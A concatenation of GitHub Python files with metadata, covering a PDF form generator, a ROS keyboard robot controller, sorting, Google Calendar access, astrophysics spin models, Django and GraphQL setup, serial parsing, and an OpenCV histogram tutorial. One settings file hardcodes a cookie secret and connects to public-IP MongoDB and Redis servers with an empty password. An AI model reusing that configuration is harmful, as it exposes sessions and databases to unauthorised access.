txt=\"Entschuldigungsformular der Technik-AG\", align=\"C\", ln=1)\n\n pdf.normal_font()\n pdf.multi_cell(\n w=0,\n h=7,\n txt=\"Der/die Schüler*in {} hat am {} von der {}. Stunde bis zur {}. Stunde folgende Aufgaben für \"\n \"die Technik-AG zu erledigen:\".format(\n technician.name, formats.date_format(date), start, stop\n ),\n )\n\n pdf.cell(w=0, h=3, ln=1)\n\n pdf.mono_font()\n pdf.multi_cell(w=0, h=7, txt=reason)\n\n pdf.cell(w=0, h=3, ln=1)\n\n pdf.normal_font()\n pdf.multi_cell(\n w=0, h=7, txt=\"Deshalb bitte ich darum, sein/ihr Fehlen zu entschuldigen.\"\n )\n\n pdf.cell(w=0, h=20, ln=1)\n pdf.set_font(\"line\", size=12)\n pdf.cell(w=40, txt=\"___________________\")\n pdf.cell(w=30)\n pdf.cell(w=50, txt=\"________________________________\", ln=1)\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=40, txt=\"Datum\")\n pdf.cell(w=30)\n pdf.cell(w=50, txt=\"Belaya/Sievers\", ln=1)\n\n return pdf.save_in_tmp(\"excuse-form-{}-{}.pdf\".format(technician, date))\n","repo_name":"elgohr-update/tinventory","sub_path":"web/api/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":10241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"78829148","text":"#!/usr/bin/env python\nimport rospy\nfrom pynput.keyboard import Key, Listener\nfrom std_msgs.msg import String\nfrom ros_basics.msg import Movement\n\nFRCOMBINATIONS = [\n {Key.up, Key.right}\n \n]\n\nFLCOMBINATIONS = [\n {Key.up,Key.left}\n \n]\n\n\nBRCOMBINATIONS = [\n {Key.down, Key.right}\n \n]\n\nBLCOMBINATIONS = [\n {Key.down, Key.left}\n \n]\n\n\n# The currently active modifiers\ncurrent = set()\n\n# globals\nMessage = \"null\"\ndata = Movement()\n\n# define key press event callback\ndef on_press(key):\n global Message\n if any([key in COMBO for COMBO in FRCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in FRCOMBINATIONS):\n print(\"forward right\")\n data.forward = True\n data.frontRight = True\n data.backRight = False\n if any([key in COMBO for COMBO in FLCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in FLCOMBINATIONS):\n print(\"forward left\")\n data.forward = True\n data.frontLeft = True\n data.backLeft = False\n if any([key in COMBO for COMBO in BRCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in BRCOMBINATIONS):\n print(\"backward right\")\n data.backward = True\n data.backRight = True\n data.frontRight = False\n if any([key in COMBO for COMBO in BLCOMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in BLCOMBINATIONS):\n print(\"backward left\")\n data.backward = True\n data.backLeft = True\n data.frontLeft = False\n \n if(key==Key.up):\n print(\"forward\")\n data.forward = True\n elif(key==Key.down):\n print(\"backward\")\n data.backward = True\n elif(key==Key.right):\n print(\"Right\")\n data.frontRight = True\n elif(key==Key.left):\n print(\"Left\")\n data.frontLeft = True\n try:\n k = key.char # single-char keys\n except:\n k = key.name # other keys\n Message = k\n\n# define key release event callback\ndef on_release(key):\n global Message\n data.forward = False\n data.backward = False\n data.frontRight = False\n data.frontLeft = False\n data.backRight = False\n data.backLeft = False\n if any([key in COMBO for COMBO in FRCOMBINATIONS]):\n current.remove(key)\n elif any([key in COMBO for COMBO in FLCOMBINATIONS]):\n current.remove(key)\n elif any([key in COMBO for COMBO in BRCOMBINATIONS]):\n current.remove(key)\n elif any([key in COMBO for COMBO in BLCOMBINATIONS]):\n current.remove(key)\n Message = \"null\"\n # stop on PAUSE\n if key == Key.pause:\n print(\"quit on PAUSE\")\n return False\n\n\n# main section\nif __name__ == \"__main__\":\n # setup ros publisher\n pub = rospy.Publisher('Data', Movement, queue_size=10) # name of topic: /ctrl_cmd\n rospy.init_node('COntrol', anonymous=True) # name of node: /keyboard_input\n rate = rospy.Rate(10) # publish messages at 10Hz\n\n # setup keyboard listener\n listener = Listener(on_press=on_press, on_release=on_release, suppress=False)\n listener.start()\n\n # MAIN LOOP\n # endlessly react on keyboard events and send appropriate messages\n while listener.running and not rospy.is_shutdown():\n rospy.loginfo(data)\n pub.publish(data)\n rate.sleep()\n","repo_name":"TejasAnilkumar12/ROS","sub_path":"src/keyboard_controller/scripts/keyboardROS_Sender.py","file_name":"keyboardROS_Sender.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73872888807","text":"def quick_sort(array):\n # first test if the lenght is minus to 1\n if len(array) <= 1:\n return array\n else:\n pivot = array.pop() # Delete the last element and insert in the var pivot\n\n # list of divide\n bigger_list = []\n lower_list = []\n\n for item in array: # Define order, in my case descending\n if item > pivot:\n bigger_list.append(item)\n else:\n lower_list.append(item)\n return quick_sort(bigger_list) + [pivot] + quick_sort(lower_list)\n\n\ndef diffBig2(array):\n bigger = quick_sort(array)\n return bigger[0] - bigger[1]\n\n\nif __name__ == '__main__':\n print(diffBig2([10, 5, 2]))\n","repo_name":"AlejoCJaimes/Codewars","sub_path":"diff_biggest_two_numbers.py","file_name":"diff_biggest_two_numbers.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74277002087","text":"#!/usr/bin/env python3\n# _*_coding:utf-8_*_\n\n# 设置文件配置\nimport os\n\nimport motor\nimport redis\n\nfrom common.loggerLib import get_logger\n\nsettings = dict(\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n cookie_secret=\"bZJc2sWbQLKosdcdGkHn/VytrsDghDuyhfksdfsSDSsdfJ5/xJ89E=\",\n login_url=\"/login\",\n # xsrf_cookies=True,\n debug=True,\n)\n\n# 日志模块\nlogger = get_logger(strFileName=\"userBase.log\",\n debug=20,\n showStreamLog=True,\n saveLogPath=None)\n\n# 获取数据库连接\ntry:\n g_motor_db = motor.motor_tornado.MotorClient(\"mongodb://112.74.204.250:27017\").userbase\n g_redis_db = redis.StrictRedis(host='112.74.204.250', port=6379, password=\"\", db=0)\nfinally:\n logger.info(\"g_motor_db: %s\" % g_motor_db)\n logger.info(\"g_redis_db: %s\" % g_redis_db)\n\n# 是否把数据写入redis: False 表示不写入redis, True表示写入redis\ng_redis_on = True\n\n# redis 数据保存时间\ng_redis_time_5m = 5 * 60\ng_redis_time_10m = 10 * 60\ng_redis_time_30m = 30 * 60\ng_redis_time_1h = 1 * 60 * 60\n\n# 提示语\ng_msg_token = \"token 错误或过期,请重新获取token, token有效时间为1800s.\"\n\n# 公司列表\ng_company_dict = {\n \"NjLT\": \"南京领添信息技术有限公司\",\n \"SzKS\": \"深圳库尚信息技术有限公司\",\n \"GzLT\": \"广州领添分公司\",\n}\n","repo_name":"xin1195/userbase","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28739743388","text":"from __future__ import print_function\nimport httplib2\nimport os\n\nfrom apiclient import discovery\nimport oauth2client\nfrom oauth2client import client\nfrom oauth2client import tools\n\nimport dateutil.parser\n\nfrom jinja2 import Environment, FileSystemLoader\n\nimport datetime\n\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/calendar-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Calendar API P ython Quickstart'\n\ndef df(value):\n key = \"\"\n key = 'dateTime' if 'dateTime' in value else \"\"\n key = 'date' if key == \"\" and \"date\" in value else key\n if key == \"\":\n print(value)\n return \"\"\n format=\"%I:%M\" if key == 'dateTime' else \"%d %b \" \n \n dv = value[key]\n d = dateutil.parser.parse(dv)\n o = d.strftime(format)\n return o\n\ndef ed(value):\n key = \"\"\n key = 'dateTime' if 'dateTime' in value else \"\"\n key = 'date' if key == \"\" and \"date\" in value else key\n if key == \"\":\n print(value)\n return (\"\", \"\")\n return (key, dateutil.parser.parse(value[key]))\n \n\n \ndef dd(event):\n start = ed(event['start'])\n end = ed(event['end'])\n \n o = \"\"\n if start[0] == \"date\":\n o = start[1].strftime(\"%d %b\")\n \n if start[0] == \"dateTime\":\n o = start[1].strftime(\"%I:%M\")\n\n if end[0] == \"date\":\n o = o + \" - \" + end[1].strftime(\"%d %b\")\n \n if end[0] == \"dateTime\":\n o = o + \" - \" + end[1].strftime(\"%I:%M %d %b\") \n return o\n\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'calendar-python-quickstart.json')\n\n store = oauth2client.file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n \"\"\"Shows basic usage of the Google Calendar API.\n\n Creates a Google Calendar API service object and outputs a list of the next\n 10 events on the user's calendar.\n \"\"\"\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http)\n\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n print('Getting the upcoming 10 events')\n eventsResult = service.events().list(\n calendarId='primary', timeMin=now, maxResults=100, singleEvents=True,\n orderBy='startTime').execute()\n events = eventsResult.get('items', [])\n\t\n default = 'Details Coming Soon'\n if not events:\n print('No upcoming events found.')\n # GET https://www.googleapis.com/calendar/v3/calendars/primary/events/n6arcebcdv2b28ds4u8dr14pis?fields=description&key={YOUR_API_KEY}\n \n j2_env = Environment(loader=FileSystemLoader(THIS_DIR),\n trim_blocks=True)\n j2_env.filters['datetime'] = df\n j2_env.filters['dd'] = dd\n\n \n print(j2_env.get_template('eventsByName.html').render(events=events))\n \n# for event in events:\n \n \n# description = event.get('description', default)\n\n# start = event['start'].get('dateTime', event['start'].get('date'))\n\t\t\n# print (\"Time: %s Event: %s Description: %s\"%(start, event['summary'], description))\n\n\nif __name__ == '__main__':\n main()","repo_name":"lagerrabbit/CalendarStuff","sub_path":"quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2727674776","text":"from ..utils import beta_dist, truncnorm\n\n\ndef iid_spin(dataset, xi_spin, sigma_spin, amax, alpha_chi, beta_chi):\n \"\"\"\n Independently and identically distributed spins.\n \"\"\"\n prior = (\n iid_spin_orientation_gaussian_isotropic(dataset, xi_spin, sigma_spin) *\n iid_spin_magnitude_beta(dataset, amax, alpha_chi, beta_chi))\n return prior\n\n\ndef iid_spin_magnitude_beta(dataset, amax=1, alpha_chi=1, beta_chi=1):\n \"\"\"\n Independently and identically distributed spin magnitudes.\n \"\"\"\n return independent_spin_magnitude_beta(\n dataset, alpha_chi, alpha_chi, beta_chi, beta_chi, amax, amax)\n\n\ndef independent_spin_magnitude_beta(dataset, alpha_chi_1, alpha_chi_2,\n beta_chi_1, beta_chi_2, amax_1, amax_2):\n \"\"\" Independent beta distributions for both spin magnitudes.\n\n https://arxiv.org/abs/1805.06442 Eq. (10)\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.beta.html\n\n Parameters\n ----------\n dataset: dict\n Dictionary of numpy arrays containing 'a_1' and 'a_2'.\n alpha_chi_1, beta_chi_1: float\n Parameters of Beta distribution for more massive black hole.\n alpha_chi_2, beta_chi_2: float\n Parameters of Beta distribution for less massive black hole.\n amax_1, amax_2: float\n Maximum spin of the more/less massive black hole.\n \"\"\"\n if alpha_chi_1 < 0 or beta_chi_1 < 0 or alpha_chi_2 < 0 or beta_chi_2 < 0:\n return 0\n prior = (beta_dist(dataset['a_1'], alpha_chi_1, beta_chi_1, scale=amax_1) *\n beta_dist(dataset['a_2'], alpha_chi_2, beta_chi_2, scale=amax_2))\n return prior\n\n\ndef iid_spin_orientation_gaussian_isotropic(dataset, xi_spin, sigma_spin):\n \"\"\"\n Independently and identically distributed spin orientations.\n \"\"\"\n return independent_spin_orientation_gaussian_isotropic(\n dataset, xi_spin, sigma_spin, sigma_spin)\n\n\ndef independent_spin_orientation_gaussian_isotropic(\n dataset, xi_spin, sigma_1, sigma_2):\n \"\"\"A mixture model of spin orientations with isotropic and normally\n distributed components.\n\n https://arxiv.org/abs/1704.08370 Eq. (4)\n\n Parameters\n ----------\n dataset: dict\n Dictionary of numpy arrays for 'cos_tilt_1' and 'cos_tilt_2'.\n xi_spin: float\n Fraction of black holes in preferentially aligned component.\n sigma_1: float\n Width of preferentially aligned component for the more\n massive black hole.\n sigma_2: float\n Width of preferentially aligned component for the less\n massive black hole.\n \"\"\"\n prior = ((1 - xi_spin) / 4 + xi_spin *\n truncnorm(dataset['cos_tilt_1'], 1, sigma_1, 1, -1) *\n truncnorm(dataset['cos_tilt_2'], 1, sigma_2, 1, -1))\n return prior\n","repo_name":"cjhaster/gwpopulation","sub_path":"gwpopulation/models/spin.py","file_name":"spin.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"69919163367","text":"# -*- coding: utf-8 -*-\n\"\"\"OrderManagementSystem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom OrderManagementSystem import settings\nfrom c_index import views\n\nurlpatterns = [\n url(r'^$', views.index), # 直接进入首页\n url(r'^admin/', include(admin.site.urls)),\n url(r'^tinymce/', include('tinymce.urls')),\n url(r'^', include('c_login.urls')),\n url(r'^', include('c_register.urls')),\n url(r'^', include('c_index.urls')),\n url(r'^', include('c_chart.urls')),\n url(r'^', include('c_order.urls')),\n url(r'^', include('b_home.urls')),\n url(r'^', include('b_login.urls')),\n # url(r'^search/', include('haystack.urls')),\n # url(r'^search/', views.MySearchView.as_view()),\n\n]\n\n# 让 Django 给通过开发服务器上传的媒体文件提供服务\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"Justinzhao666/OrderManagementSystem","sub_path":"OrderManagementSystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72288196649","text":"import strawberry\nfrom strawberry_django_plus import gql\n\nfrom app_schema import mutations, queries, subscriptions\n\n\n@gql.type\nclass Queries(\n queries.Query,\n):\n ...\n\n\n@gql.type\nclass Mutations(\n mutations.Mutation,\n):\n ...\n\n\n@gql.type\nclass Subscriptions(\n subscriptions.Subscription,\n):\n ...\n\n\nschema = strawberry.Schema(\n query=Queries,\n mutation=Mutations,\n subscription=Subscriptions,\n)\n","repo_name":"ZipBrandon/pgschemas_async","sub_path":"pgschemas_async/app_schema/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3102970187","text":"import json\nfrom datetime import datetime\nimport serial\n\nclass Gateway:\n \"\"\"\n Gateway Class\n\n SUPPORT:\n JSON-only communication messages.\n\n FUNCTIONS:\n checksum()\n parse()\n reset()\n \"\"\"\n def __init__(self, use_checksum=False, timeout=1, baud=38400, device=\"/dev/ttyACM0\"):\n \"\"\"\n Initialize the Gateway\n \"\"\"\n # Get settings\n self.use_checksum = use_checksum\n self.device = device\n self.baud = baud\n self.timeout = timeout\n\n try:\n self.port = serial.Serial(self.device, self.baud, timeout=self.timeout)\n except Exception as e:\n self.port = None\n raise e\n\n def byteify(self, input):\n if isinstance(input, dict):\n return {self.byteify(key) : self.byteify(value) for key,value in input.iteritems()}\n elif isinstance(input, list):\n return [self.byteify(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf-8')\n else:\n return input\n\n def poll(self, chars=256, force_read=False): \n s = self.port.readline()\n msg = self.byteify(json.loads(s)) # parse as JSON\n if self.use_checksum:\n chksum = self.checksum(msg['data'])\n if self.checksum(msg['data']) == msg['chksum']: # run checksum of parsed dictionary\n return msg # return data if checksum ok\n else:\n return None # return None if checksum failed\n else:\n return msg\n\n def checksum(self, data, mod=256, force_precision=2):\n \"\"\"\n Calculate checksum\n \"\"\"\n chksum = 0\n s = str(data)\n s_clean = s.replace(' ', '')\n for i in s_clean:\n chksum += ord(i)\n return chksum % mod\n\n def reset(self):\n pass\n","repo_name":"trevstanhope/rhum","sub_path":"manager/tools/CAN.py","file_name":"CAN.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12004553988","text":"import os\r\nimport cv2\r\n\r\npath = \"../output\"\r\npath3 = \"../../web_final\"\r\nw = 1920\r\nh = 1080\r\nimg_total = []\r\ntxt_total = []\r\nfile = os.listdir(path)\r\nfor filename in file:\r\n first, last = os.path.splitext(filename)\r\n if last == \".jpg\":\r\n img_total.append(first)\r\n else:\r\n txt_total.append(first)\r\nfor img_ in img_total:\r\n if img_ in txt_total:\r\n filename_img = img_ + \".jpg\"\r\n path1 = os.path.join(path, filename_img)\r\n img = cv2.imread(path1)\r\n filename_txt = img_ + \".txt\"\r\n n = 1\r\n with open(os.path.join(path, filename_txt), \"r+\", encoding=\"utf-8\", errors=\"ignore\") as f:\r\n for line in f:\r\n aa = line.split(\" \")\r\n x_center = w * float(aa[1])\r\n y_center = h * float(aa[2])\r\n width = int(w * float(aa[3]))\r\n height = int(h * float(aa[4]))\r\n lefttopx = int(x_center - width / 2.0)\r\n lefttopy = int(y_center - height / 2.0)\r\n roi = img[lefttopy + 1:lefttopy + height - 1, lefttopx + 1:lefttopx + width - 1]\r\n filename_last = img_ + \"_\" + str(n) + \".jpg\"\r\n print(filename_last)\r\n path2 = os.path.join(path3, \"roi\")\r\n cv2.imwrite(os.path.join(path2, filename_last), roi)\r\n n = n + 1\r\n else:\r\n continue\r\n","repo_name":"JerryAuas/web_final","sub_path":"tools/save_img.py","file_name":"save_img.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"10693633599","text":"import os\nINITIAL_FRAME_RATE = 10\nJPEG_QUALITY = 20\n\n\nEXPLORE_INTERVAL=1\nPIPELINE_UPDATE_PRECISION=0.1\n\nQ_READ_TIMEOUT = 10000\nINPUT_VIDEO = 0#\"test_video40.avi\"#0#\"/Users/davide/Google Drive/University/PhD/19_sigcom_w/GOPR9840.MP4\"#0#\"test_video40.avi\"\nMAX_IMG_QUEUE = 10\nSAVE_IMG = False\nSHOW_IMG = False\nDAEMONIAC_THREADS = True\nCONNECTION_STRING = \"/dev/ttyUSB0\"#\"127.0.0.1:14550\"\n\n# Variables for detection -> movement\nMAX_IMG_QUEUE = 3\nX_CUTOFF = 0.1\nY_CUTOFF = 0.1\nAREA_CUTOFF = 1000\nFORWARD = 1\nBACKWARD = -1\nRIGHT = 1\nLEFT = -1\nUP = 1\nDOWN = -1\nTARGET_AREA = 10000\n\nALPHA = 0.1\nMOVEMENT_DURATION = 0.4\n\nBUFF_SIZE = 1024\nMODEL_PATH = \"models\"\n\nMESSAGE = \"Oh bella ciao\"\nQ_READ_TIMEOUT = 10000\nDEVICE_STATE_UPDATE = 0.5\n\nUDP_DISCOVERY_PORT = 5006\nINITIAL_TCP_PORT = 12001\nBUFF_SIZE = 1024\nJPEG = True\n\nLOGS_PATH = \"logs\"\nBOOKKEEPER_path = os.path.join(LOGS_PATH, \"_tenboom.csv\")\nFLIGHTLOG_NAME_path = os.path.join(LOGS_PATH, \"FlightLog_{}.csv\")\nDEVICE_LOG_path = os.path.join(LOGS_PATH, \"bubi_{}.csv\")\nBOOKKEEPER = \"_tenboom.csv\"\nFLIGHTLOG_NAME = \"FlightLog_{}.csv\"\nDEVICE_LOG = \"bubi_{}.csv\"\n\nDELTA_E = 0.3\nDELTA_L = 0.7\n\nmodels = [\"ssd_mobilenet_v1_coco_2018_01_28\",\n \"ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03\",\n \"ssd_mobilenet_v2_coco_2018_03_29\",\n \"ssdlite_mobilenet_v2_coco_2018_05_09\",\n \"ssdlite_mobilenet_v2_coco_FP32_50_trt.pb\"]\n\nDECISION_POLICY = \"energy_saving\"\nENERGY_SAVING_THR = 0.25\nVERBOSE = False","repo_name":"uci-iasl/SeReMAS","sub_path":"config_v3_2.py","file_name":"config_v3_2.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"22185657922","text":"# USAGE\n# python David_1_12_1_color_histograms.py --image beach.png\n# python David_1_12_1_color_histograms.py --image \"../../data/horseshoe_bend.png\"\n# python David_1_12_1_color_histograms.py --image \"../../../CV-PyImageSearch Gurus Course/Dataset/data/horseshoe_bend.png\"\n\n# interpolation : https://matplotlib.org/3.1.3/gallery/images_contours_and_fields/interpolation_methods.html\n\n# 1. Preprocessing : \n\n # 1.1 import the necessary packages\nfrom matplotlib import pyplot as plt\nimport argparse\nimport imutils\nimport cv2\n\n # 1.2 construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"Path to the image\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\nprint(\"image:\",image)\nprint(image.shape) # (475, 600, 3)\nprint(type(image)) # numpy array\n\n# 2. Flattened' Color Histogram : \n\n # 2.1 (!!) Figure 1 , Flattened' Color Histogram\n # 2.1.1 numpy -> List\nchans = cv2.split(image)\nprint(\"chans:\",chans)\nprint(type(chans))\n\n # 2.2 Add Plot describe (plo中 標題(title)及x, y軸的文字描述)\ncolors = (\"B\",\"G\",\"R\") \nplt.figure()\nplt.title(\"Flatten-color-Histogram\")\nplt.xlabel(\"x axis(Bins)\")\nplt.ylabel(\"Y axis (# of Pixels)\")\n\n # 2.3 (!!!) loop to visualize in the plot(用迴圈繪出圖形)\nfor (chan, i) in zip(chans, colors): # 放到for裡面的chans是一個list的型態\n \n\t# create a histogram for the current channel and plot it\n\thist = cv2.calcHist([chan], [0], None, [256], [0, 256])\n\tplt.plot(hist, color = i)\n\tplt.xlim([0, 256]) # 設定x軸範圍(一般來說都落在 0-255中)\n\n# 3. 2D histograms : \n # let's move on to 2D histograms -- we need to reduce the number of bins in the histogram from 256 to 32 so we can better visualize the results\nfig = plt.figure()\n\n # 2.1.1 plot a 2D color histogram for green and blue\nax = fig.add_subplot(131)\nhist = cv2.calcHist([chans[1], chans[0]], [0, 1], None, [32, 32],\n\t[0, 256, 0, 256])\np = ax.imshow(hist, interpolation=\"nearest\")\nax.set_title(\"2D Color Histogram for G and B\")\nplt.colorbar(p)\n\n # 2.1.2 plot a 2D color histogram for green and red\nax = fig.add_subplot(132)\nhist = cv2.calcHist([chans[1], chans[2]], [0, 1], None, [32, 32],\n\t[0, 256, 0, 256])\np = ax.imshow(hist, interpolation=\"nearest\")\nax.set_title(\"2D Color Histogram for G and R\")\nplt.colorbar(p)\n\n # 2.1.3 plot a 2D color histogram for blue and red\nax = fig.add_subplot(133)\nhist = cv2.calcHist([chans[0], chans[2]], [0, 1], None, [32, 32],\n\t[0, 256, 0, 256])\np = ax.imshow(hist, interpolation=\"nearest\")\nax.set_title(\"2D Color Histogram for B and R\")\nplt.colorbar(p)\n\n\n# 4. 2D Histogram and 3D Histogramshape\n \n # 4.1 (2D Hist shape 與 faltten shape ) : make sure the 2D Hist shape and the faltten shape values \n # finally, let's examine the dimensionality of one of the 2D histograms\nprint(\"2D histogram shape: {}, with {} values\".format(\n\thist.shape, hist.flatten().shape[0])) # 2D histogram shape: (32, 32), with 1024 values\n\n\n # 4.2 3D Histogram shape(只能show shape無法建3D圖) : \n # our 2D histogram could only take into account 2 out of the 3 channels in the image so now let's build a 3D color histogram\n # (utilizing all channels) with 8 bins in each direction -- we can't plot the 3D histogram, but the theory is exactly like\n # that of a 2D histogram, so we'll just show the shape of the histogram\n\nhist = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\nprint(\"3D histogram shape: {}, with {} values\".format(\n\thist.shape, hist.flatten().shape[0])) # 3D histogram shape: (8, 8, 8), with 512 values\n\n# display the image with matplotlib to avoid GUI conflicts on macOS\nplt.figure()\nplt.axis(\"off\")\nplt.imshow(imutils.opencv2matplotlib(image))\n\n# Show our plots\nplt.show()\nplt.close()\n\n#-------------------------- chp1_12_2 grayscale_histogram.py\n\n\n# 1. Turn to grayscale\n\nimage = cv2.imread(args[\"image\"])\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nprint(\"image : \", type(image))\nprint(\"image shape: \", image.shape)\ncv2.imshow(\"image\",image)\n\n # 1.1 (!!)construct a grayscale histogram\nhist = cv2.calcHist([image], [0], None, [256], [0, 256])\nprint(\"hist : \", type(hist))\nprint(\"hist shape: \", hist.shape)\ncv2.imshow(\"hist\",hist)\ncv2.waitKey(0)\n\n\n # matplotlib expects RGB images so convert and then display the image\n # with matplotlib to avoid GUI conflicts/errors (mainly on macOS)\nplt.figure()\nplt.axis(\"on\") # x ,y axis reveal or not\nplt.imshow(cv2.cvtColor(image, cv2.COLOR_GRAY2RGB))\n\n # plot the histogram\nplt.figure()\nplt.title(\"Grayscale-Histogram\")\nplt.xlabel(\"Bins\")\nplt.ylabel(\"# of Pixels\")\nplt.plot(hist)\nplt.xlim([0, 256])\n\n # 1.2(!!) normalize the histogram\n # plot the normalized histogram\n\nhist /= hist.sum()\nplt.figure()\nplt.title(\"Grayscale Histogram (Normalized)\")\nplt.xlabel(\"x axis(Bins)\")\nplt.ylabel(\"Y axis - % of Pixels \")\nplt.plot(hist)\nplt.xlim([0, 256])\nplt.show()\nplt.close()\n\n# ----------------------- chp1_12_3 equalize.py (均衡化)\n\n #(!!) cv2.equalizeHist()只提供灰度值處理 RGB匯報錯\n \n \n# apply histogram equalization to stretch the constrast of our image\nequalize = cv2.equalizeHist(image)\n# show our images -- notice how the constrast of the second image has\n# been stretched\ncv2.imshow(\"Original\", image)\ncv2.imshow(\"Histogram Equalization\", equalize)\ncv2.waitKey(0)\n\n\n\n# ------------------------------ chp1_12_4 histogram_with_mask.py 這張可以學習如何遮罩\nimport numpy as np\n\n\n# grab the image channels, initialize the tuple of colors and the figure\n\ndef plot_histogram(image, title, mask = None) :\n\tchans = cv2.split(image)\n\tcolors = (\"b\", \"g\", \"r\")\n\tplt.figure()\n\tplt.title(title)\n\tplt.xlabel(\"Bins\")\n\tplt.ylabel(\"# of Pixels\")\n\n\t# loop over the image channels\n\tfor (chan, color) in zip(chans, colors):\n\t\t# create a histogram for the current channel and plot it\n\t\thist = cv2.calcHist([chan], [0], mask, [256], [0, 256])\n\t\tplt.plot(hist, color=color)\n\t\tplt.xlim([0, 256])\n \nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\nplot_histogram(image, \"Histogram for Original Image\")\n\n # construct a mask for our image -- our mask will be BLACK for regions\n # we want to IGNORE and WHITE for regions we want to EXAMINE\nmask = np.zeros(image.shape[:2], dtype=\"uint8\")\ncv2.rectangle(mask, (60, 290), (210, 390), 255, -1) # 設定mask區域\ncv2.imshow(\"Mask\", mask)\n\n # 原影像圖與mask結合 ,what does masking our image look like?\nmasked = cv2.bitwise_and(image, image, mask=mask) \ncv2.imshow(\"Applying the Mask\", masked)\n\n # compute a histogram for our image, but we'll only include pixels in the masked region\nplot_histogram(image, \"Histogram for Masked Image\", mask=mask)\nplt.show()","repo_name":"wcsodw1/Computer-Vision","sub_path":"CV_Pyimage/Module 1 CV Basic Technical/chp_1_12_histograms/David_1_12_1_color_histograms.py","file_name":"David_1_12_1_color_histograms.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13401578588","text":"import re\nimport sys\nimport tree_sitter\n\nfrom sctokenizer import CppTokenizer, JavaTokenizer\nfrom sctokenizer.token import TokenType, Token\nfrom typing import List\n\n\ndef _join_by_rows(tokens: List[Token]):\n rows = []\n current_row = -1\n 